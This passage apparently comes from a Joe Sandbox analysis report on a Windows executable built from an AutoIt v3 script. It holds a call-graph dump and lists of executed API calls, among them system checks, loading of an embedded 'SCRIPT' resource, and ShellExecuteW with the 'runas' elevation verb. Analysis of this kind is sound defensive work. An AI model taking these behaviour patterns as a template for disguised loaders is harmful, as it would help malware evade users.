e622f0 96028->96050 96030 e1e5eb 29 API calls 96029->96030 96030->96028 96056 e62557 40 API calls __fread_nolock 96031->96056 96034 e62311 96032->96034 96034->96031 96036 e6231a 96034->96036 96035 e62370 96037 e62374 96035->96037 96038 e62395 96035->96038 96036->96050 96064 e1e678 96036->96064 96039 e62381 96037->96039 96042 e1e678 67 API calls 96037->96042 96057 e62171 96038->96057 96046 e1e678 67 API calls 96039->96046 96039->96050 96042->96039 96043 e6239d 96044 e623c3 96043->96044 96045 e623a3 96043->96045 96077 e623f3 74 API calls 96044->96077 96047 e623b0 96045->96047 96049 e1e678 67 API calls 96045->96049 96046->96050 96047->96050 96051 e1e678 67 API calls 96047->96051 96049->96047 96050->95878 96051->96050 96052 e623ca 96053 e623de 96052->96053 96054 e1e678 67 API calls 96052->96054 96053->96050 96055 e1e678 67 API calls 96053->96055 96054->96053 96055->96050 96056->96035 96058 e1ea0c ___std_exception_copy 21 API calls 96057->96058 96059 e6217f 96058->96059 96060 e1ea0c ___std_exception_copy 21 API calls 96059->96060 96061 e62190 96060->96061 96062 e1ea0c ___std_exception_copy 21 API calls 96061->96062 96063 e6219c 96062->96063 96063->96043 96065 e1e684 ___BuildCatchObject 96064->96065 96066 e1e695 96065->96066 96067 e1e6aa 96065->96067 96095 e1f2d9 20 API calls _abort 96066->96095 96076 e1e6a5 __fread_nolock 96067->96076 96078 e1918d EnterCriticalSection 96067->96078 96070 e1e69a 96096 e227ec 26 API calls ___std_exception_copy 96070->96096 96071 e1e6c6 96079 e1e602 96071->96079 96074 e1e6d1 96097 e1e6ee LeaveCriticalSection __fread_nolock 96074->96097 96076->96050 96077->96052 96078->96071 96080 e1e624 96079->96080 96081 e1e60f 96079->96081 96086 e1e61f 96080->96086 96098 e1dc0b 96080->96098 96130 e1f2d9 20 API calls _abort 96081->96130 96083 e1e614 96131 e227ec 26 API calls ___std_exception_copy 96083->96131 96086->96074 96091 e1e646 96115 e2862f 96091->96115 96094 e229c8 _free 20 API calls 96094->96086 96095->96070 96096->96076 96097->96076 96099 e1dc23 96098->96099 96103 e1dc1f 96098->96103 96100 e1d955 __fread_nolock 26 API calls 96099->96100 96099->96103 96101 e1dc43 96100->96101 96132 e259be 62 API calls 5 library calls 96101->96132 96104 e24d7a 96103->96104 96105 e24d90 96104->96105 96106 e1e640 96104->96106 96105->96106 96107 e229c8 _free 20 API calls 96105->96107 96108 e1d955 96106->96108 96107->96106 96109 e1d961 96108->96109 96110 e1d976 96108->96110 96133 e1f2d9 20 API calls _abort 96109->96133 96110->96091 96112 e1d966 96134 e227ec 26 API calls ___std_exception_copy 96112->96134 96114 e1d971 96114->96091 96116 e28653 96115->96116 96117 e2863e 96115->96117 96119 e2868e 96116->96119 96123 e2867a 96116->96123 96138 e1f2c6 20 API calls _abort 96117->96138 96140 e1f2c6 20 API calls _abort 96119->96140 96120 e28643 96139 e1f2d9 20 API calls _abort 96120->96139 96135 e28607 96123->96135 96124 e28693 96141 e1f2d9 20 API calls _abort 96124->96141 96127 e1e64c 96127->96086 96127->96094 96128 e2869b 96142 e227ec 26 API calls ___std_exception_copy 96128->96142 96130->96083 96131->96086 96132->96103 96133->96112 96134->96114 96143 e28585 96135->96143 96137 e2862b 96137->96127 96138->96120 96139->96127 96140->96124 96141->96128 96142->96127 96144 e28591 ___BuildCatchObject 96143->96144 96154 e25147 EnterCriticalSection 96144->96154 96146 e2859f 96147 e285d1 96146->96147 96148 e285c6 96146->96148 96155 e1f2d9 20 API calls _abort 96147->96155 96149 e286ae __wsopen_s 29 API calls 96148->96149 96151 e285cc 96149->96151 96156 e285fb LeaveCriticalSection __wsopen_s 96151->96156 96153 e285ee __fread_nolock 96153->96137 96154->96146 96155->96151 96156->96153 96157 df3156 96160 df3170 96157->96160 96161 df3187 96160->96161 96162 df318c 96161->96162 96163 df31eb 96161->96163 96201 df31e9 96161->96201 96164 df3199 96162->96164 96165 df3265 PostQuitMessage 96162->96165 96167 e32dfb 96163->96167 96168 df31f1 96163->96168 96170 df31a4 96164->96170 96171 e32e7c 96164->96171 96189 df316a 96165->96189 96166 df31d0 DefWindowProcW 96166->96189 96216 df18e2 10 API calls 96167->96216 96172 df321d SetTimer RegisterWindowMessageW 96168->96172 96173 df31f8 96168->96173 96175 df31ae 96170->96175 96176 e32e68 96170->96176 96220 e5bf30 34 API calls ___scrt_fastfail 96171->96220 96177 df3246 CreatePopupMenu 96172->96177 96172->96189 96179 df3201 KillTimer 96173->96179 96180 e32d9c 96173->96180 96174 e32e1c 96217 e0e499 42 API calls 96174->96217 96183 df31b9 96175->96183 96184 e32e4d 96175->96184 96205 e5c161 96176->96205 96177->96189 96212 df30f2 Shell_NotifyIconW ___scrt_fastfail 96179->96212 96186 e32da1 96180->96186 96187 e32dd7 MoveWindow 96180->96187 96190 df31c4 96183->96190 96191 df3253 96183->96191 96184->96166 96219 e50ad7 22 API calls 96184->96219 96185 e32e8e 96185->96166 96185->96189 96192 e32da7 96186->96192 96193 e32dc6 SetFocus 96186->96193 96187->96189 96190->96166 96218 df30f2 Shell_NotifyIconW ___scrt_fastfail 96190->96218 96214 df326f 44 API calls ___scrt_fastfail 96191->96214 96192->96190 96197 e32db0 96192->96197 96193->96189 96194 df3214 96213 df3c50 DeleteObject DestroyWindow 96194->96213 96215 df18e2 10 API calls 96197->96215 96199 df3263 96199->96189 96201->96166 96203 e32e41 96204 df3837 49 API calls 96203->96204 96204->96201 96206 e5c276 96205->96206 96207 e5c179 ___scrt_fastfail 96205->96207 96206->96189 96208 df3923 24 API calls 96207->96208 96210 e5c1a0 96208->96210 96209 e5c25f KillTimer SetTimer 96209->96206 96210->96209 96211 e5c251 Shell_NotifyIconW 96210->96211 96211->96209 96212->96194 96213->96189 96214->96199 96215->96189 96216->96174 96217->96190 96218->96203 96219->96201 96220->96185 96221 df1033 96226 df4c91 96221->96226 96225 df1042 96227 dfa961 22 API calls 96226->96227 96228 df4cff 96227->96228 96234 df3af0 96228->96234 96231 df4d9c 96232 df1038 96231->96232 96237 df51f7 22 API calls __fread_nolock 96231->96237 96233 e100a3 29 API calls __onexit 96232->96233 96233->96225 96238 df3b1c 96234->96238 96237->96231 96239 df3b0f 96238->96239 96240 df3b29 96238->96240 96239->96231 96240->96239 96241 df3b30 RegOpenKeyExW 96240->96241 96241->96239 96242 df3b4a RegQueryValueExW 96241->96242 96243 df3b6b 96242->96243 96244 df3b80 RegCloseKey 96242->96244 96243->96244 96244->96239 96245 df1cad SystemParametersInfoW 96246 dfdea9 96249 df1e74 96246->96249 96248 dfdeb3 96250 df1e8b 96249->96250 96251 df1f6f 181 API calls 96250->96251 96252 df1eaa 96251->96252 96252->96248 96253 e103fb 96254 e10407 ___BuildCatchObject 96253->96254 96282 e0feb1 96254->96282 96256 e10561 96309 e1083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96256->96309 96257 e1040e 96257->96256 96260 e10438 96257->96260 96259 e10568 96310 e14e52 28 API calls _abort 96259->96310 96270 e10477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96260->96270 96293 e2247d 96260->96293 96262 e1056e 96311 e14e04 28 API calls _abort 96262->96311 96266 e10576 96267 e10457 96269 e104d8 96301 e10959 96269->96301 96270->96269 96305 e14e1a 38 API calls 2 library calls 96270->96305 96273 e104de 96274 e104f3 96273->96274 96306 e10992 GetModuleHandleW 96274->96306 96276 e104fa 96276->96259 96277 e104fe 96276->96277 96278 e10507 96277->96278 96307 e14df5 28 API calls _abort 96277->96307 96308 e10040 13 API calls 2 library calls 96278->96308 96281 e1050f 96281->96267 96283 e0feba 96282->96283 96312 e10698 IsProcessorFeaturePresent 96283->96312 96285 e0fec6 96313 e12c94 10 API calls 3 library calls 96285->96313 96287 e0fecb 96292 e0fecf 96287->96292 96314 e22317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96287->96314 96289 e0fed8 96290 e0fee6 96289->96290 96315 e12cbd 8 API calls 3 library calls 96289->96315 96290->96257 96292->96257 96294 e22494 96293->96294 96316 e10a8c 96294->96316 96296 e10451 96296->96267 96297 e22421 96296->96297 96298 e22450 96297->96298 96299 e10a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96298->96299 96300 e22479 96299->96300 96300->96270 96324 e12340 96301->96324 96304 e1097f 96304->96273 96305->96269 96306->96276 96307->96278 96308->96281 96309->96259 96310->96262 96311->96266 96312->96285 96313->96287 96314->96289 96315->96292 96317 e10a95 96316->96317 96318 e10a97 IsProcessorFeaturePresent 96316->96318 96317->96296 96320 e10c5d 96318->96320 96323 e10c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96320->96323 96322 e10d40 96322->96296 96323->96322 96325 e1096c GetStartupInfoW 96324->96325 96325->96304 96326 df1044 96331 df10f3 96326->96331 96328 df104a 96367 e100a3 29 API calls __onexit 96328->96367 96330 df1054 96368 df1398 96331->96368 96335 df116a 96336 dfa961 22 API calls 96335->96336 96337 df1174 96336->96337 96338 dfa961 22 API calls 96337->96338 96339 df117e 96338->96339 96340 dfa961 22 API calls 96339->96340 96341 df1188 96340->96341 96342 dfa961 22 API calls 96341->96342 96343 df11c6 96342->96343 96344 dfa961 22 API calls 96343->96344 96345 df1292 96344->96345 96378 df171c 96345->96378 96349 df12c4 96350 dfa961 22 API calls 96349->96350 96351 df12ce 96350->96351 96352 e01940 9 API calls 96351->96352 96353 df12f9 96352->96353 96399 df1aab 96353->96399 96355 df1315 96356 df1325 GetStdHandle 96355->96356 96357 df137a 96356->96357 96358 e32485 96356->96358 96361 df1387 OleInitialize 96357->96361 96358->96357 96359 e3248e 96358->96359 96360 e0fddb 22 API calls 96359->96360 96362 e32495 96360->96362 96361->96328 96406 e6011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96362->96406 96364 e3249e 96407 e60944 CreateThread 96364->96407 96366 e324aa CloseHandle 96366->96357 96367->96330 96408 df13f1 96368->96408 96371 df13f1 22 API calls 96372 df13d0 96371->96372 96373 dfa961 22 API calls 96372->96373 96374 df13dc 96373->96374 96375 df6b57 22 API calls 96374->96375 96376 df1129 96375->96376 96377 df1bc3 6 API calls 96376->96377 96377->96335 96379 dfa961 22 API calls 96378->96379 96380 df172c 96379->96380 96381 dfa961 22 API calls 96380->96381 96382 df1734 96381->96382 96383 dfa961 22 API calls 96382->96383 96384 df174f 96383->96384 96385 e0fddb 22 API calls 96384->96385 96386 df129c 96385->96386 96387 df1b4a 96386->96387 96388 df1b58 96387->96388 96389 dfa961 22 API calls 96388->96389 96390 df1b63 96389->96390 96391 dfa961 22 API calls 96390->96391 96392 df1b6e 96391->96392 96393 dfa961 22 API calls 96392->96393 96394 df1b79 96393->96394 96395 dfa961 22 API calls 96394->96395 96396 df1b84 96395->96396 96397 e0fddb 22 API calls 96396->96397 96398 df1b96 RegisterWindowMessageW 96397->96398 96398->96349 96400 df1abb 96399->96400 96401 e3272d 96399->96401 96402 e0fddb 22 API calls 96400->96402 96415 e63209 23 API calls 96401->96415 96404 df1ac3 96402->96404 96404->96355 96405 e32738 96406->96364 96407->96366 96416 e6092a 28 API calls 96407->96416 96409 dfa961 22 API calls 96408->96409 96410 df13fc 96409->96410 96411 dfa961 22 API calls 96410->96411 96412 df1404 96411->96412 96413 dfa961 22 API calls 96412->96413 96414 df13c6 96413->96414 96414->96371 96415->96405 96417 df2de3 96418 df2df0 __wsopen_s 96417->96418 96419 df2e09 96418->96419 96420 e32c2b ___scrt_fastfail 96418->96420 96421 df3aa2 23 API calls 96419->96421 96422 e32c47 GetOpenFileNameW 96420->96422 96423 df2e12 96421->96423 96425 e32c96 96422->96425 96433 df2da5 96423->96433 96427 df6b57 22 API calls 96425->96427 96429 e32cab 96427->96429 96429->96429 96430 df2e27 96451 df44a8 96430->96451 96434 e31f50 __wsopen_s 96433->96434 96435 df2db2 GetLongPathNameW 96434->96435 96436 df6b57 22 API calls 96435->96436 96437 df2dda 96436->96437 96438 df3598 96437->96438 96439 dfa961 22 API calls 96438->96439 96440 df35aa 96439->96440 96441 df3aa2 23 API calls 96440->96441 96442 df35b5 96441->96442 96443 df35c0 96442->96443 96447 e332eb 96442->96447 96445 df515f 22 API calls 96443->96445 96446 df35cc 96445->96446 96480 df35f3 96446->96480 96449 e3330d 96447->96449 96486 e0ce60 41 API calls 96447->96486 96450 df35df 96450->96430 96452 df4ecb 94 API calls 96451->96452 96453 df44cd 96452->96453 96454 e33833 96453->96454 96455 df4ecb 94 API calls 96453->96455 96456 e62cf9 80 API calls 96454->96456 96457 df44e1 96455->96457 96458 e33848 96456->96458 96457->96454 96459 df44e9 96457->96459 96460 e33869 96458->96460 96461 e3384c 96458->96461 96463 e33854 96459->96463 96464 df44f5 96459->96464 96462 e0fe0b 22 API calls 96460->96462 96465 df4f39 68 API calls 96461->96465 96479 e338ae 96462->96479 96488 e5da5a 82 API calls 96463->96488 96487 df940c 136 API calls 2 library calls 96464->96487 96465->96463 96468 df2e31 96469 e33862 96469->96460 96470 df4f39 68 API calls 96473 e33a5f 96470->96473 96473->96470 96494 e5989b 82 API calls __wsopen_s 96473->96494 96476 df9cb3 22 API calls 96476->96479 96479->96473 96479->96476 96489 e5967e 22 API calls __fread_nolock 96479->96489 96490 e595ad 42 API calls _wcslen 96479->96490 96491 e60b5a 22 API calls 96479->96491 96492 dfa4a1 22 API calls __fread_nolock 96479->96492 96493 df3ff7 22 API calls 96479->96493 96481 df3605 96480->96481 96485 df3624 __fread_nolock 96480->96485 96483 e0fe0b 22 API calls 96481->96483 96482 e0fddb 22 API calls 96484 df363b 96482->96484 96483->96485 96484->96450 96485->96482 96486->96447 96487->96468 96488->96469 96489->96479 96490->96479 96491->96479 96492->96479 96493->96479 96494->96473 96495 e82a55 96503 e61ebc 96495->96503 96498 e82a70 96505 e539c0 22 API calls 96498->96505 96500 e82a7c 96506 e5417d 22 API calls __fread_nolock 96500->96506 96502 e82a87 96504 e61ec3 IsWindow 96503->96504 96504->96498 96504->96502 96505->96500 96506->96502

                                                        Executed Functions

                                                        Function 00DF42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 234 df42de-df434d call dfa961 GetVersionExW call df6b57 239 e33617-e3362a 234->239 240 df4353 234->240 242 e3362b-e3362f 239->242 241 df4355-df4357 240->241 243 df435d-df43bc call df93b2 call df37a0 241->243 244 e33656 241->244 245 e33632-e3363e 242->245 246 e33631 242->246 262 e337df-e337e6 243->262 263 df43c2-df43c4 243->263 249 e3365d-e33660 244->249 245->242 248 e33640-e33642 245->248 246->245 248->241 251 e33648-e3364f 248->251 252 df441b-df4435 GetCurrentProcess IsWow64Process 249->252 253 e33666-e336a8 249->253 251->239 255 e33651 251->255 258 df4437 252->258 259 df4494-df449a 252->259 253->252 256 e336ae-e336b1 253->256 255->244 260 e336b3-e336bd 256->260 261 e336db-e336e5 256->261 264 df443d-df4449 258->264 259->264 265 e336ca-e336d6 260->265 266 e336bf-e336c5 260->266 268 e336e7-e336f3 261->268 269 e336f8-e33702 261->269 270 e33806-e33809 262->270 271 e337e8 262->271 263->249 267 df43ca-df43dd 263->267 272 df444f-df445e LoadLibraryA 264->272 273 e33824-e33828 GetSystemInfo 264->273 265->252 266->252 276 e33726-e3372f 267->276 277 df43e3-df43e5 267->277 268->252 279 e33715-e33721 269->279 280 e33704-e33710 269->280 281 e337f4-e337fc 270->281 282 e3380b-e3381a 270->282 278 e337ee 271->278 274 df449c-df44a6 GetSystemInfo 272->274 275 df4460-df446e GetProcAddress 272->275 284 df4476-df4478 274->284 275->274 283 df4470-df4474 GetNativeSystemInfo 275->283 287 e33731-e33737 276->287 288 e3373c-e33748 276->288 285 df43eb-df43ee 277->285 286 e3374d-e33762 277->286 278->281 279->252 280->252 281->270 282->278 289 e3381c-e33822 282->289 283->284 292 df447a-df447b FreeLibrary 284->292 293 df4481-df4493 284->293 294 e33791-e33794 285->294 295 df43f4-df440f 285->295 290 e33764-e3376a 286->290 291 e3376f-e3377b 286->291 287->252 288->252 289->281 290->252 291->252 292->293 294->252 296 e3379a-e337c1 294->296 297 e33780-e3378c 295->297 298 df4415 295->298 299 e337c3-e337c9 296->299 300 e337ce-e337da 296->300 297->252 298->252 299->252 300->252
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 00DF430D
                                                          • Part of subcall function 00DF6B57: _wcslen.LIBCMT ref: 00DF6B6A
                                                        • GetCurrentProcess.KERNEL32(?,00E8CB64,00000000,?,?), ref: 00DF4422
                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00DF4429
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00DF4454
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DF4466
                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00DF4474
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00DF447B
                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 00DF44A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                        • API String ID: 3290436268-3101561225
                                                        • Opcode ID: 4055d3fb13bffa216de366e29fceee8fbb466ed98de3439eb0f050e15cb6d98c
                                                        • Instruction ID: 3238f8ca9197221938cb04b39d0fbef266834d2c3ce9f1a54f7fb25350465293
                                                        • Opcode Fuzzy Hash: 4055d3fb13bffa216de366e29fceee8fbb466ed98de3439eb0f050e15cb6d98c
                                                        • Instruction Fuzzy Hash: 11A1B06191A2C4DFC712D77E7C45DA63EA46B67308B1AA9F9D081B3A23D262450ECB31
                                                        Function 00DF42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 499 df42a2-df42ba CreateStreamOnHGlobal 500 df42bc-df42d3 FindResourceExW 499->500 501 df42da-df42dd 499->501 502 df42d9 500->502 503 e335ba-e335c9 LoadResource 500->503 502->501 503->502 504 e335cf-e335dd SizeofResource 503->504 504->502 505 e335e3-e335ee LockResource 504->505 505->502 506 e335f4-e33612 505->506 506->502
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00DF50AA,?,?,00000000,00000000), ref: 00DF42B2
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DF50AA,?,?,00000000,00000000), ref: 00DF42C9
                                                        • LoadResource.KERNEL32(?,00000000,?,?,00DF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00DF4F20), ref: 00E335BE
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00DF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00DF4F20), ref: 00E335D3
                                                        • LockResource.KERNEL32(00DF50AA,?,?,00DF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00DF4F20,?), ref: 00E335E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: b4591834ff2cb557d1754166bb23dafaa54a1b341f641224f6c03b4f80ad8ce4
                                                        • Instruction ID: f4cf3f45112b2174e7301555464e6fa05394543b0f99f7e8e62044f596346c27
                                                        • Opcode Fuzzy Hash: b4591834ff2cb557d1754166bb23dafaa54a1b341f641224f6c03b4f80ad8ce4
                                                        • Instruction Fuzzy Hash: 91118E70201704BFD7218B66DC48F277BB9EBC6B51F248169F506E66A0DB71DC048730
                                                        Function 00E32BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00DF2B6B
                                                          • Part of subcall function 00DF3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EC1418,?,00DF2E7F,?,?,?,00000000), ref: 00DF3A78
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,00EB2224), ref: 00E32C10
                                                        • ShellExecuteW.SHELL32(00000000,?,?,00EB2224), ref: 00E32C17
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                        • String ID: runas
                                                        • API String ID: 448630720-4000483414
                                                        • Opcode ID: a347f65d8ecbedf5396db06b4e50ae8903111e6e40d8ce8a0daabe0d6fdeb0ac
                                                        • Instruction ID: bfe89de3d292e4c1b3c06fff9d5421e5a960a09e761fe48fb452c596c91501fb
                                                        • Opcode Fuzzy Hash: a347f65d8ecbedf5396db06b4e50ae8903111e6e40d8ce8a0daabe0d6fdeb0ac
                                                        • Instruction Fuzzy Hash: 3A11A5315083496AC705FF64D852EBEB7A4EF96340F46942DF796620A3DF21894A8732
                                                        Function 00DFD730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetInputState.USER32 ref: 00DFD807
                                                        • timeGetTime.WINMM ref: 00DFDA07
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DFDB28
                                                        • TranslateMessage.USER32(?), ref: 00DFDB7B
                                                        • DispatchMessageW.USER32(?), ref: 00DFDB89
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DFDB9F
                                                        • Sleep.KERNELBASE(0000000A), ref: 00DFDBB1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                        • String ID:
                                                        • API String ID: 2189390790-0
                                                        • Opcode ID: 007bb4f30fe39e23464309f4340972c6c5aec3a6c7464245b27918f5902fd06c
                                                        • Instruction ID: 25f4eac81ca138de1da4c8a5e186b38da600540cd16393a7368492e4e3153c7d
                                                        • Opcode Fuzzy Hash: 007bb4f30fe39e23464309f4340972c6c5aec3a6c7464245b27918f5902fd06c
                                                        • Instruction Fuzzy Hash: 6A42F230604245DFD728CF24C884BBAB7E2FF46304F59855DFA99A7291C771E884CBA2
                                                        Function 00DF2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00DF2D07
                                                        • RegisterClassExW.USER32(00000030), ref: 00DF2D31
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DF2D42
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00DF2D5F
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DF2D6F
                                                        • LoadIconW.USER32(000000A9), ref: 00DF2D85
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DF2D94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: c373e7f2d084eb7317090a7142fecad7e57cfb5626e61ae331c801b64ec1ab46
                                                        • Instruction ID: 246dcf735b02b3de15fb2a3ba5fc5e2b401fe0b24a12e2bd3bfd781190f87443
                                                        • Opcode Fuzzy Hash: c373e7f2d084eb7317090a7142fecad7e57cfb5626e61ae331c801b64ec1ab46
                                                        • Instruction Fuzzy Hash: FA21F7B1901308AFDB00DFA6EC49BDDBBB4FB4A704F10416AF515B62A1D7B24549CFA1
                                                        Function 00E3065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 302 e3065b-e3068b call e3042f 305 e306a6-e306b2 call e25221 302->305 306 e3068d-e30698 call e1f2c6 302->306 312 e306b4-e306c9 call e1f2c6 call e1f2d9 305->312 313 e306cb-e30714 call e3039a 305->313 311 e3069a-e306a1 call e1f2d9 306->311 322 e3097d-e30983 311->322 312->311 320 e30781-e3078a GetFileType 313->320 321 e30716-e3071f 313->321 326 e307d3-e307d6 320->326 327 e3078c-e307bd GetLastError call e1f2a3 CloseHandle 320->327 324 e30721-e30725 321->324 325 e30756-e3077c GetLastError call e1f2a3 321->325 324->325 331 e30727-e30754 call e3039a 324->331 325->311 329 e307d8-e307dd 326->329 330 e307df-e307e5 326->330 327->311 341 e307c3-e307ce call e1f2d9 327->341 334 e307e9-e30837 call e2516a 329->334 330->334 335 e307e7 330->335 331->320 331->325 345 e30847-e3086b call e3014d 334->345 346 e30839-e30845 call e305ab 334->346 335->334 341->311 352 e3087e-e308c1 345->352 353 e3086d 345->353 346->345 351 e3086f-e30879 call e286ae 346->351 351->322 355 e308c3-e308c7 352->355 356 e308e2-e308f0 352->356 353->351 355->356 358 e308c9-e308dd 355->358 359 